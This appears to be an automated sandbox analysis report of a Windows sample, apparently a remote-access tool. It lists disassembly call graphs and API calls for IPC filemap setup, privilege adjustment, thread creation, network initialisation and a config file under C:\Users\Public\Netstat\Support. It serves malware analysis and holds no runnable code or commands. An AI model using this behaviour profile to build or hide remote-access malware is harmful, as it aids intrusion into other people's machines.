85832 6d1e5948 85864 6d1e6dfa DecodePointer TlsFree DeleteCriticalSection _free DeleteCriticalSection 85832->85864 85856 6d1e98c4 9 API calls 85833->85856 85837 6d1e59cd _free 85834->85837 85838 6d1e59b6 85834->85838 85837->85823 85867 6d1e6e37 5 API calls __getptd_noexit 85838->85867 85865 6d1e5965 5 API calls __mtterm 85839->85865 85840 6d1e58df 85842 6d1e58ea 85840->85842 85843 6d1e58e3 85840->85843 85858 6d1eef5b ___initmbctable GetModuleFileNameA __malloc_crt _parse_cmdline 85842->85858 85857 6d1e6dfa DecodePointer TlsFree DeleteCriticalSection _free DeleteCriticalSection 85843->85857 85845 6d1e59bd GetCurrentThreadId 85845->85823 85847 6d1e58ef 85848 6d1e5903 85847->85848 85859 6d1eecd4 11 API calls __invoke_watson 85847->85859 85854 6d1e5908 85848->85854 85861 6d1e9b09 DeleteCriticalSection _free 85848->85861 85851 6d1e58f8 85851->85848 85860 6d1e5c32 __initterm_e EncodePointer __initp_misc_cfltcvt_tab __IsNonwritableInCurrentImage 85851->85860 85852 6d1e5918 85852->85843 85854->85823 85855->85820 85856->85840 85857->85823 85858->85847 85859->85851 85860->85848 85861->85852 85862->85824 85863->85832 85864->85839 85865->85823 85866->85828 85867->85845 85868 110304b8 85869 11142a60 267 API calls 85868->85869 85870 110304c6 85869->85870 85871 11142bb0 86 API calls 85870->85871 85872 11030503 85871->85872 85873 11030518 85872->85873 85875 11081bb0 86 API calls 85872->85875 85874 110ed1a0 8 API calls 85873->85874 85876 1103053f 85874->85876 85875->85873 85877 11030589 85876->85877 85940 110ed250 81 API calls 2 library calls 85876->85940 85880 11142bb0 86 API calls 85877->85880 85879 11030554 85941 110ed250 81 API calls 2 library calls 85879->85941 85882 110305a0 85880->85882 85884 1110f420 std::locale::facet::_Facet_Register 265 API calls 85882->85884 85883 1103056b 85883->85877 85885 111463d0 19 API calls 85883->85885 85886 110305af 85884->85886 85885->85877 85887 110305d0 85886->85887 85942 11088860 268 API calls 85886->85942 85919 1108a470 85887->85919 85890 110305e3 OpenMutexA 85891 11030603 CreateMutexA 85890->85891 85892 1103071a CloseHandle 85890->85892 85894 11030623 85891->85894 85893 1108a570 69 API calls 85892->85893 85895 11030730 85893->85895 85896 1110f420 std::locale::facet::_Facet_Register 265 API calls 85894->85896 85900 11161d01 __ehhandler$?_Copy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@IAEXII@Z 5 API calls 85895->85900 85897 11030638 85896->85897 85898 1103065b 85897->85898 85943 11060be0 293 API calls std::locale::facet::_Facet_Register 85897->85943 85930 11015c30 LoadLibraryA 85898->85930 85901 110310b3 85900->85901 85903 1103066d 85904 111450a0 std::locale::facet::_Facet_Register 90 API calls 85903->85904 85905 1103067c 85904->85905 85906 11030689 85905->85906 85907 1103069c 85905->85907 85931 11145ae0 85906->85931 85908 110306a6 GetProcAddress 85907->85908 85909 11030690 85907->85909 85908->85909 85911 110306c0 SetLastError 85908->85911 85912 110281a0 47 API calls 85909->85912 85911->85909 85913 110306cd 85912->85913 85944 110092f0 427 API calls std::locale::facet::_Facet_Register 85913->85944 85915 110306dc 85916 110306f0 WaitForSingleObject 85915->85916 85916->85916 85917 11030702 CloseHandle 85916->85917 85917->85892 85918 11030713 FreeLibrary 85917->85918 85918->85892 85920 1110f420 std::locale::facet::_Facet_Register 265 API calls 85919->85920 85921 1108a4a7 85920->85921 85922 1108a4c9 InitializeCriticalSection 85921->85922 85924 1110f420 std::locale::facet::_Facet_Register 265 API calls 85921->85924 85925 1108a52a 85922->85925 85926 1108a4c2 85924->85926 85925->85890 85926->85922 85945 1116219a 66 API calls std::exception::_Copy_str 85926->85945 85928 1108a4f9 85946 111625f1 RaiseException 85928->85946 85930->85903 85932 111450a0 std::locale::facet::_Facet_Register 90 API calls 85931->85932 85933 11145af2 85932->85933 85934 11145b30 85933->85934 85935 11145af9 LoadLibraryA 85933->85935 85934->85909 85936 11145b2a 85935->85936 85937 11145b0b GetProcAddress 85935->85937 85936->85909 85938 11145b23 FreeLibrary 85937->85938 85939 11145b1b 85937->85939 85938->85936 85939->85938 85940->85879 85941->85883 85942->85887 85943->85898 85944->85915 85945->85928 85946->85922 85947 1116970d 85948 1116971d 85947->85948 85949 11169718 85947->85949 85953 11169617 85948->85953 85965 11177075 GetSystemTimeAsFileTime GetCurrentProcessId GetCurrentThreadId GetTickCount QueryPerformanceCounter 85949->85965 85952 1116972b 85955 11169623 _setlocale 85953->85955 85954 11169670 85962 111696c0 _setlocale 85954->85962 86016 11025e20 85954->86016 85955->85954 85955->85962 85966 111694b3 85955->85966 85958 11169683 85959 111696a0 85958->85959 85961 11025e20 ___DllMainCRTStartup 7 API calls 85958->85961 85960 111694b3 __CRT_INIT@12 149 API calls 85959->85960 85959->85962 85960->85962 85963 11169697 85961->85963 85962->85952 85964 111694b3 __CRT_INIT@12 149 API calls 85963->85964 85964->85959 85965->85948 85967 111694bf _setlocale 85966->85967 85968 111694c7 85967->85968 85969 11169541 85967->85969 86025 1116d4d0 HeapCreate 85968->86025 85971 11169547 85969->85971 85972 111695a2 85969->85972 85977 11169565 85971->85977 85985 111694d0 _setlocale 85971->85985 86113 1116d79b 66 API calls _doexit 85971->86113 85973 111695a7 85972->85973 85974 11169600 85972->85974 85976 1116b5fa ___set_flsgetvalue 3 API calls 85973->85976 85974->85985 86119 1116b8fe 79 API calls __freefls@4 85974->86119 85975 111694cc 85975->85985 86026 1116b96c GetModuleHandleW 85975->86026 85979 111695ac 85976->85979 85982 11169579 85977->85982 86114 1117140e 67 API calls _free 85977->86114 85986 11169dbe __calloc_crt 66 API calls 85979->85986 86117 1116958c 70 API calls __mtterm 85982->86117 85985->85954 85989 111695b8 85986->85989 85987 111694dc __RTC_Initialize 85990 111694e0 85987->85990 85995 111694ec GetCommandLineA 85987->85995 85988 1116956f 86115 1116b64b 70 API calls _free 85988->86115 85989->85985 85993 111695c4 DecodePointer 85989->85993 86110 1116d4ee HeapDestroy 85990->86110 85996 111695d9 85993->85996 85994 11169574 86116 1116d4ee HeapDestroy 85994->86116 86051 11176f92 GetEnvironmentStringsW 85995->86051 85999 111695f4 85996->85999 86000 111695dd 85996->86000 86003 11162be5 _free 66 API calls 85999->86003 86118 1116b688 66 API calls 4 library calls 86000->86118 86003->85985 86005 111695e4 GetCurrentThreadId 86005->85985 86007 1116950a 86111 1116b64b 70 API calls _free 86007->86111 86011 1116952a 86011->85985 86112 1117140e 67 API calls _free 86011->86112 86017 1110f7d0 86016->86017 86018 1110f7f1 86017->86018 86019 1110f7dc 86017->86019 86020 1110f804 ___DllMainCRTStartup 86017->86020 86136 1110f720 86018->86136 86019->86020 86022 1110f720 ___DllMainCRTStartup 7 API calls 86019->86022 86020->85958 86024 1110f7e5 86022->86024 86023 1110f7f8 86023->85958 86024->85958 86025->85975 86027 1116b980 86026->86027 86028 1116b989 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 86026->86028 86120 1116b64b 70 API calls _free 86027->86120 86031 1116b9d3 TlsAlloc 86028->86031 86030 1116b985 86030->85987 86033 1116bae2 86031->86033 86034 1116ba21 TlsSetValue 86031->86034 86033->85987 86034->86033 86035 1116ba32 86034->86035 86121 1116d557 EncodePointer EncodePointer __init_pointers ___crtMessageBoxW __initp_misc_winsig 86035->86121 86037 1116ba37 EncodePointer EncodePointer EncodePointer EncodePointer 86122 111735c2 InitializeCriticalSectionAndSpinCount 86037->86122 86039 1116ba76 86040 1116badd 86039->86040 86041 1116ba7a DecodePointer 86039->86041 86124 1116b64b 70 API calls _free 86040->86124 86043 1116ba8f 86041->86043 86043->86040 86044 11169dbe __calloc_crt 66 API calls 86043->86044 86045 1116baa5 86044->86045 86045->86040 86046 1116baad DecodePointer 86045->86046 86047 1116babe 86046->86047 86047->86040 86048 1116bac2 86047->86048 86123 1116b688 66 API calls 4 library calls 86048->86123 86050 1116baca GetCurrentThreadId 86050->86033 86055 11176fae WideCharToMultiByte 86051->86055 86057 111694fc 86051->86057 86053 11176fe3 86056 11169d79 __malloc_crt 66 API calls 86053->86056 86054 1117701b FreeEnvironmentStringsW 86054->86057 86055->86053 86055->86054 86058 11176fe9 86056->86058 86064 111711c9 GetStartupInfoW 86057->86064 86058->86054 86059 11176ff1 WideCharToMultiByte 86058->86059 86060 11177003 86059->86060 86061 1117700f FreeEnvironmentStringsW 86059->86061 86062 11162be5 _free 66 API calls 86060->86062 86061->86057 86063 1117700b 86062->86063 86063->86061 86065 11169dbe __calloc_crt 66 API calls 86064->86065 86067 111711e7 86065->86067 86066 1117135c 86068 11171392 GetStdHandle 86066->86068 86070 111713f6 SetHandleCount 86066->86070 86071 111713a4 GetFileType 86066->86071 86076 111713ca InitializeCriticalSectionAndSpinCount 86066->86076 86067->86066 86069 11169dbe __calloc_crt 66 API calls 86067->86069 86072 11169506 86067->86072 86073 111712dc 86067->86073 86068->86066 86069->86067 86070->86072 86071->86066 86072->86007 86077 11176ed7 86072->86077 86073->86066 86074 11171313 InitializeCriticalSectionAndSpinCount 86073->86074 86075 11171308 GetFileType 86073->86075 86074->86072 86074->86073 86075->86073 86075->86074 86076->86066 86076->86072 86078 11176ef1 GetModuleFileNameA 86077->86078 86079 11176eec 86077->86079 86081 11176f18 86078->86081 86131 11170be7 94 API calls __setmbcp 86079->86131 86125 11176d3d 86081->86125 86083 11169516 86083->86011 86088 11176c61 86083->86088 86085 11169d79 __malloc_crt 66 API calls 86086 11176f5a 86085->86086 86086->86083 86087 11176d3d _parse_cmdline 76 API calls 86086->86087 86087->86083 86089 11176c6a 86088->86089 86092 11176c6f _strlen 86088->86092 86133 11170be7 94 API calls __setmbcp 86089->86133 86091 1116951f 86091->86011 86104 1116d5ae 86091->86104 86092->86091 86093 11169dbe __calloc_crt 66 API calls 86092->86093 86095 11176ca4 _strlen 86093->86095 86094 11176cf3 86096 11162be5 _free 66 API calls 86094->86096 86095->86091 86095->86094 86097 11169dbe __calloc_crt 66 API calls 86095->86097 86098 11176d19 86095->86098 86099 1116be9f _strcpy_s 66 API calls 86095->86099 86101 11176d30 86095->86101 86096->86091 86097->86095 86100 11162be5 _free 66 API calls 86098->86100 86099->86095 86100->86091 86102 1116deb2 __invoke_watson 10 API calls 86101->86102 86103 11176d3c 86102->86103 86105 1116d5bc __IsNonwritableInCurrentImage 86104->86105 86134 1116c9cb EncodePointer 86105->86134 86107 1116d5da __initterm_e 86109 1116d5fb __IsNonwritableInCurrentImage 86107->86109 86135 11162f15 76 API calls __cinit 86107->86135 86109->86011 86110->85985 86111->85990 86112->86007 86113->85977 86114->85988 86115->85994 86116->85982 86117->85985 86118->86005 86119->85985 86120->86030 86121->86037 86122->86039 86123->86050 86124->86033 86127 11176d5c 86125->86127 86128 11176dc9 86127->86128 86132 111766ce 76 API calls x_ismbbtype_l 86127->86132 86129 11176ec7 86128->86129 86130 111766ce 76 API calls __splitpath_helper 86128->86130 86129->86083 86129->86085 86130->86128 86131->86078 86132->86127 86133->86092 86134->86107 86135->86109 86137 1110f764 EnterCriticalSection 86136->86137 86138 1110f74f InitializeCriticalSection 86136->86138 86139 1110f785 86137->86139 86138->86137 86140 1110f7b3 LeaveCriticalSection 86139->86140 86141 1110f6c0 ___DllMainCRTStartup 4 API calls 86139->86141 86140->86023 86141->86139 86142 6d1c63a0 86143 6d1c63a5 86142->86143 86144 6d1c63a9 WSACancelBlockingCall 86143->86144 86145 6d1c63b1 Sleep 86143->86145

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 716 1109e190-1109e1f2 call 1109d980 719 1109e1f8-1109e21b call 1109d440 716->719 720 1109e810 716->720 726 1109e221-1109e235 LocalAlloc 719->726 727 1109e384-1109e386 719->727 722 1109e812-1109e82d call 11161d01 720->722 728 1109e23b-1109e26d InitializeSecurityDescriptor SetSecurityDescriptorDacl GetVersionExA 726->728 729 1109e805-1109e80b call 1109d4d0 726->729 730 1109e316-1109e33b CreateFileMappingA 727->730 733 1109e2fa-1109e310 728->733 734 1109e273-1109e29e call 1109d3a0 call 1109d3f0 728->734 729->720 731 1109e388-1109e39b GetLastError 730->731 732 1109e33d-1109e35d GetLastError call 1112ef20 730->732 738 1109e39d 731->738 739 1109e3a2-1109e3b9 MapViewOfFile 731->739 745 1109e368-1109e370 732->745 746 1109e35f-1109e366 LocalFree 732->746 733->730 765 1109e2e9-1109e2f1 734->765 766 1109e2a0-1109e2d6 GetSecurityDescriptorSacl 734->766 738->739 742 1109e3bb-1109e3d6 call 1112ef20 739->742 743 1109e3f7-1109e3ff 739->743 759 1109e3d8-1109e3d9 LocalFree 742->759 760 1109e3db-1109e3e3 742->760 747 1109e4a1-1109e4b3 743->747 748 1109e405-1109e41e GetModuleFileNameA 743->748 755 1109e372-1109e373 LocalFree 745->755 756 1109e375-1109e37f 745->756 746->745 751 1109e4f9-1109e512 call 11161d20 GetTickCount 747->751 752 1109e4b5-1109e4b8 747->752 753 1109e4bd-1109e4d8 call 1112ef20 748->753 754 1109e424-1109e42d 748->754 777 1109e514-1109e519 751->777 761 1109e59f-1109e603 GetCurrentProcessId GetModuleFileNameA call 1109d810 752->761 781 1109e4da-1109e4db LocalFree 753->781 782 1109e4dd-1109e4e5 753->782 754->753 762 1109e433-1109e436 754->762 755->756 764 1109e7fe-1109e800 call 1109d8c0 756->764 759->760 769 1109e3e8-1109e3f2 760->769 770 1109e3e5-1109e3e6 LocalFree 760->770 786 1109e60b-1109e622 CreateEventA 761->786 787 1109e605 761->787 772 1109e479-1109e49c call 1112ef20 call 1109d8c0 762->772 773 1109e438-1109e43c 762->773 764->729 765->733 767 1109e2f3-1109e2f4 FreeLibrary 765->767 766->765 776 1109e2d8-1109e2e3 SetSecurityDescriptorSacl 766->776 767->733 769->764 770->769 772->747 773->772 780 1109e43e-1109e449 773->780 776->765 783 1109e51b-1109e52a 777->783 784 1109e52c 777->784 788 1109e450-1109e454 780->788 781->782 789 1109e4ea-1109e4f4 782->789 790 1109e4e7-1109e4e8 LocalFree 782->790 783->777 783->784 791 1109e52e-1109e534 784->791 795 1109e624-1109e643 GetLastError * 2 call 1112ef20 786->795 796 1109e646-1109e64e 786->796 787->786 793 1109e470-1109e472 788->793 794 1109e456-1109e458 788->794 789->764 790->789 800 1109e545-1109e59d 791->800 801 1109e536-1109e543 791->801 797 1109e475-1109e477 793->797 802 1109e45a-1109e460 794->802 803 1109e46c-1109e46e 794->803 795->796 798 1109e650 796->798 799 1109e656-1109e667 CreateEventA 796->799 797->753 797->772 798->799 806 1109e669-1109e688 GetLastError * 2 call 1112ef20 799->806 807 1109e68b-1109e693 799->807 800->761 801->791 801->800 802->793 808 1109e462-1109e46a 802->808 803->797 806->807 810 1109e69b-1109e6ad CreateEventA 807->810 811 1109e695 807->811 808->788 808->803 813 1109e6af-1109e6ce GetLastError * 2 call 1112ef20 810->813 814 1109e6d1-1109e6d9 810->814 811->810 813->814 816 1109e6db 814->816 817 1109e6e1-1109e6f2 CreateEventA 814->817 816->817 818 1109e714-1109e722 817->818 819 1109e6f4-1109e711 GetLastError * 2 call 1112ef20 817->819 822 1109e724-1109e725 LocalFree 818->822 823 1109e727-1109e72f 818->823 819->818 822->823 825 1109e731-1109e732 LocalFree 823->825 826 1109e734-1109e73d 823->826 825->826 827 1109e743-1109e746 826->827 828 1109e7e7-1109e7f9 call 1112ef20 826->828 827->828 830 1109e74c-1109e74f 827->830 828->764 830->828 832 1109e755-1109e758 830->832 832->828 833 1109e75e-1109e761 832->833 834 1109e76c-1109e788 CreateThread 833->834 835 1109e763-1109e769 GetCurrentThreadId 833->835 836 1109e78a-1109e794 834->836 837 1109e796-1109e7a0 834->837 835->834 836->764 838 1109e7ba-1109e7e5 SetEvent call 1112ef20 call 1109d4d0 837->838 839 1109e7a2-1109e7b8 ResetEvent * 3 837->839 838->722 839->838
                                                                                        APIs
                                                                                          • Part of subcall function 1109D440: GetCurrentProcess.KERNEL32(000F01FF,?,11030063,00000000,00000000,00080000,461C6054,00080000,00000000,00000000), ref: 1109D46D
                                                                                          • Part of subcall function 1109D440: OpenProcessToken.ADVAPI32(00000000), ref: 1109D474
                                                                                          • Part of subcall function 1109D440: LookupPrivilegeValueA.ADVAPI32(00000000,00000000,?), ref: 1109D485
                                                                                          • Part of subcall function 1109D440: AdjustTokenPrivileges.KERNELBASE(00000000), ref: 1109D4A9
                                                                                        • LocalAlloc.KERNEL32(00000040,00000014,SeSecurityPrivilege,?,00080000,461C6054,00080000,00000000,00000000), ref: 1109E225
                                                                                        • InitializeSecurityDescriptor.ADVAPI32(00000000,00000001), ref: 1109E23E
                                                                                        • SetSecurityDescriptorDacl.ADVAPI32(00000000,00000001,00000000,00000000), ref: 1109E249
                                                                                        • GetVersionExA.KERNEL32(?), ref: 1109E260
                                                                                        • GetSecurityDescriptorSacl.ADVAPI32(?,?,?,?,S:(ML;;NW;;;LW),00000001,?,00000000), ref: 1109E2CE
                                                                                        • SetSecurityDescriptorSacl.ADVAPI32(00000000,00000001,?,00000000), ref: 1109E2E3
                                                                                        • FreeLibrary.KERNEL32(00000001,S:(ML;;NW;;;LW),00000001,?,00000000), ref: 1109E2F4
                                                                                        • CreateFileMappingA.KERNEL32(000000FF,11030063,00000004,00000000,?,?), ref: 1109E330
                                                                                        • GetLastError.KERNEL32 ref: 1109E33D
                                                                                        • LocalFree.KERNEL32(?), ref: 1109E366
                                                                                        • LocalFree.KERNEL32(?), ref: 1109E373
                                                                                        • GetLastError.KERNEL32 ref: 1109E390
                                                                                        • MapViewOfFile.KERNEL32(?,000F001F,00000000,00000000,00000000), ref: 1109E3AE
                                                                                        • LocalFree.KERNEL32(?), ref: 1109E3D9
                                                                                        • LocalFree.KERNEL32(?), ref: 1109E3E6
                                                                                          • Part of subcall function 1109D3A0: LoadLibraryA.KERNEL32(Advapi32.dll,00000000,1109E27E), ref: 1109D3A8
                                                                                          • Part of subcall function 1109D3F0: GetProcAddress.KERNEL32(00000000,ConvertStringSecurityDescriptorToSecurityDescriptorA), ref: 1109D404
                                                                                        • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 1109E412
                                                                                        • LocalFree.KERNEL32(?), ref: 1109E4DB
                                                                                        • LocalFree.KERNEL32(?), ref: 1109E4E8
                                                                                        • _memset.LIBCMT ref: 1109E500
                                                                                        • GetTickCount.KERNEL32 ref: 1109E508
                                                                                        • GetCurrentProcessId.KERNEL32 ref: 1109E5B4
                                                                                        • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 1109E5CF
                                                                                        • CreateEventA.KERNEL32(?,00000000,00000000,?,?,?,?,?,?), ref: 1109E61B
                                                                                        • GetLastError.KERNEL32 ref: 1109E624
                                                                                        • GetLastError.KERNEL32(00000000), ref: 1109E62B
                                                                                        • CreateEventA.KERNEL32(?,00000000,00000000,?), ref: 1109E660
                                                                                        • GetLastError.KERNEL32 ref: 1109E669
                                                                                        • GetLastError.KERNEL32(00000000), ref: 1109E670
                                                                                        • CreateEventA.KERNEL32(?,00000001,00000000,?), ref: 1109E6A6
                                                                                        • GetLastError.KERNEL32 ref: 1109E6AF
                                                                                        • GetLastError.KERNEL32(00000000), ref: 1109E6B6
                                                                                        • CreateEventA.KERNEL32(?,00000000,00000000,?), ref: 1109E6EB
                                                                                        • GetLastError.KERNEL32 ref: 1109E6FA
                                                                                        • GetLastError.KERNEL32(00000000), ref: 1109E6FD
                                                                                        • LocalFree.KERNEL32(?), ref: 1109E725
                                                                                        • LocalFree.KERNEL32(?), ref: 1109E732
                                                                                        • GetCurrentThreadId.KERNEL32 ref: 1109E763
                                                                                        • CreateThread.KERNEL32(00000000,00002000,Function_0009DD20,00000000,00000000,00000030), ref: 1109E77D
                                                                                        • ResetEvent.KERNEL32(?), ref: 1109E7AC
                                                                                        • ResetEvent.KERNEL32(?), ref: 1109E7B2
                                                                                        • ResetEvent.KERNEL32(?), ref: 1109E7B8
                                                                                        • SetEvent.KERNEL32(?), ref: 1109E7BE
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.3995717435.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000006.00000002.3995697188.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995826855.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995874203.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995894249.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_2_11000000_shv.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: ErrorLast$FreeLocal$Event$Create$DescriptorFileSecurity$CurrentProcessReset$LibraryModuleNameSaclThreadToken$AddressAdjustAllocCountDaclInitializeLoadLookupMappingOpenPrivilegePrivilegesProcTickValueVersionView_memset
                                                                                        • String ID: Cant create event %s, e=%d (x%x)$Error cant create events$Error cant map view$Error creating filemap (%d)$Error filemap exists$IPC(%s) created$Info - reusing existing filemap$S:(ML;;NW;;;LW)$SeSecurityPrivilege$cant create events$cant create filemap$cant create thread$cant map$map exists$warning map exists
                                                                                        • API String ID: 3291243470-2792520954
                                                                                        • Opcode ID: e1e4d2c24c486b94928180782bcaf8fbecda1daffafc4b641c279d7d38800a12
                                                                                        • Instruction ID: e0f3534def007632db5cc521867dfefedb1bc63d92e862916d16df31d0e36df5
                                                                                        • Opcode Fuzzy Hash: e1e4d2c24c486b94928180782bcaf8fbecda1daffafc4b641c279d7d38800a12
                                                                                        • Instruction Fuzzy Hash: 221282B590026D9FE724DF61CCD4EAEF7BABB88308F0049A9E11997244D771AD84CF51

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 844 6d1d7030-6d1d7050 call 6d1c2a90 call 6d1ddbd0 849 6d1d7097 844->849 850 6d1d7052-6d1d7095 LoadLibraryA 844->850 851 6d1d7099-6d1d70f8 call 6d1c8d00 InitializeCriticalSection CreateEventA 849->851 850->851 854 6d1d70fa-6d1d710e call 6d1c6f50 851->854 855 6d1d7111-6d1d711e CreateEventA 851->855 854->855 857 6d1d7137-6d1d7144 CreateEventA 855->857 858 6d1d7120-6d1d7134 call 6d1c6f50 855->858 861 6d1d715d-6d1d7170 WSAStartup 857->861 862 6d1d7146-6d1d715a call 6d1c6f50 857->862 858->857 863 6d1d7183-6d1d71b2 call 6d1e1b69 861->863 864 6d1d7172-6d1d7182 call 6d1c5290 call 6d1c2b70 861->864 862->861 873 6d1d71b4-6d1d71cd call 6d1c6f50 863->873 874 6d1d71d0-6d1d71e4 call 6d1e1c50 863->874 873->874 880 6d1d71fa-6d1d7202 874->880 881 6d1d71e6-6d1d71e9 874->881 883 6d1d7209-6d1d7223 call 6d1e3753 880->883 884 6d1d7204 880->884 881->880 882 6d1d71eb-6d1d71f1 881->882 882->880 885 6d1d71f3-6d1d71f8 882->885 888 6d1d723c-6d1d7255 call 6d1d9bf0 883->888 889 6d1d7225-6d1d7239 call 6d1c6f50 883->889 884->883 885->883 894 6d1d726a-6d1d7271 call 6d1c5730 888->894 895 6d1d7257-6d1d725e 888->895 889->888 899 6d1d730b-6d1d7310 894->899 900 6d1d7277-6d1d729a call 6d1e1b69 894->900 897 6d1d7260-6d1d7268 895->897 897->894 897->897 901 6d1d731e-6d1d7336 call 6d1c5e90 call 6d1c5530 899->901 902 6d1d7312-6d1d7315 899->902 908 6d1d729c-6d1d72bb call 6d1c6f50 900->908 909 6d1d72be-6d1d72dc call 6d1e1c50 call 6d1e1b69 900->909 907 6d1d7339-6d1d7354 call 6d1c5e90 901->907 902->901 905 6d1d7317-6d1d731c 902->905 905->901 905->907 920 6d1d7356-6d1d735c 907->920 921 6d1d7361-6d1d738b GetTickCount CreateThread 907->921 908->909 928 6d1d72de-6d1d72f7 call 6d1c6f50 909->928 929 6d1d72fa-6d1d7308 call 6d1e1c50 909->929 920->921 922 6d1d738d-6d1d73a6 call 6d1c6f50 921->922 923 6d1d73a9-6d1d73b6 SetThreadPriority 921->923 922->923 926 6d1d73cf-6d1d73ed call 6d1c5f20 call 6d1c5e90 923->926 927 6d1d73b8-6d1d73cc call 6d1c6f50 923->927 941 6d1d73ef 926->941 942 6d1d73f5-6d1d73f7 926->942 927->926 928->929 929->899 941->942 943 6d1d73f9-6d1d7407 call 6d1ddbd0 942->943 944 6d1d7425-6d1d7447 GetModuleFileNameA call 6d1c2420 942->944 949 6d1d741e 943->949 950 6d1d7409-6d1d741c call 6d1c4580 943->950 951 6d1d744c 944->951 952 6d1d7449-6d1d744a 944->952 954 6d1d7420 949->954 950->954 955 6d1d7451-6d1d746d 951->955 952->955 954->944 957 6d1d7470-6d1d747f 955->957 957->957 958 6d1d7481-6d1d7486 957->958 959 6d1d7487-6d1d748d 958->959 959->959 960 6d1d748f-6d1d74c8 GetPrivateProfileIntA GetModuleHandleA 959->960 961 6d1d74ce-6d1d74fa call 6d1c5e90 * 2 960->961 962 6d1d7563-6d1d758f CreateMutexA timeBeginPeriod 960->962 967 6d1d74fc-6d1d7511 call 6d1c5e90 961->967 968 6d1d7536-6d1d755d call 6d1c5e90 * 2 961->968 974 6d1d752a-6d1d7530 967->974 975 6d1d7513-6d1d7528 call 6d1c5e90 967->975 968->962 974->968 975->968 975->974
                                                                                        APIs
                                                                                          • Part of subcall function 6D1C2A90: GetModuleFileNameA.KERNEL32(00000000,?,00000100), ref: 6D1C2ACB
                                                                                          • Part of subcall function 6D1C2A90: _strrchr.LIBCMT ref: 6D1C2ADA
                                                                                          • Part of subcall function 6D1C2A90: _strrchr.LIBCMT ref: 6D1C2AEA
                                                                                          • Part of subcall function 6D1C2A90: wsprintfA.USER32 ref: 6D1C2B05
                                                                                          • Part of subcall function 6D1DDBD0: _malloc.LIBCMT ref: 6D1DDBE9
                                                                                          • Part of subcall function 6D1DDBD0: wsprintfA.USER32 ref: 6D1DDC04
                                                                                          • Part of subcall function 6D1DDBD0: _memset.LIBCMT ref: 6D1DDC27
                                                                                        • LoadLibraryA.KERNEL32(WinInet.dll), ref: 6D1D7057
                                                                                        • InitializeCriticalSection.KERNEL32(6D20B898), ref: 6D1D70DF
                                                                                        • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 6D1D70EF
                                                                                        • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 6D1D7115
                                                                                        • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 6D1D713B
                                                                                        • WSAStartup.WSOCK32(00000101,6D20B91A), ref: 6D1D7167
                                                                                        • _malloc.LIBCMT ref: 6D1D71A3
                                                                                          • Part of subcall function 6D1E1B69: __FF_MSGBANNER.LIBCMT ref: 6D1E1B82
                                                                                          • Part of subcall function 6D1E1B69: __NMSG_WRITE.LIBCMT ref: 6D1E1B89
                                                                                          • Part of subcall function 6D1E1B69: HeapAlloc.KERNEL32(00000000,00000001,00000001,00000000,00000000,?,6D1ED3C1,6D1E6E81,00000001,6D1E6E81,?,6D1EF447,00000018,6D207738,0000000C,6D1EF4D7), ref: 6D1E1BAE
                                                                                        • _memset.LIBCMT ref: 6D1D71D3
                                                                                        • _calloc.LIBCMT ref: 6D1D7214
                                                                                        • _malloc.LIBCMT ref: 6D1D728B
                                                                                        • _memset.LIBCMT ref: 6D1D72C1
                                                                                        • _malloc.LIBCMT ref: 6D1D72CD
                                                                                        • _memset.LIBCMT ref: 6D1D7303
                                                                                        • GetTickCount.KERNEL32 ref: 6D1D7361
                                                                                        • CreateThread.KERNEL32(00000000,00004000,6D1D6BA0,00000000,00000000,6D20BACC), ref: 6D1D737E
                                                                                        • SetThreadPriority.KERNEL32(00000000,00000001), ref: 6D1D73AC
                                                                                        • GetModuleFileNameA.KERNEL32(00000000,C:\Users\Public\Netstat\Support\,00000104), ref: 6D1D7430
                                                                                        • GetPrivateProfileIntA.KERNEL32(htctl.packet_tracing,mode,00000000,C:\Users\Public\Netstat\Support\pci.ini), ref: 6D1D74B0
                                                                                        • GetModuleHandleA.KERNEL32(nsmtrace), ref: 6D1D74C0
                                                                                        • CreateMutexA.KERNEL32(00000000,00000000,00000000), ref: 6D1D7566
                                                                                        • timeBeginPeriod.WINMM(00000001), ref: 6D1D7573
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.3996192540.000000006D1C1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D1C0000, based on PE: true
                                                                                        • Associated: 00000006.00000002.3996174063.000000006D1C0000.00000002.00000001.01000000.0000000E.sdmpDownload File
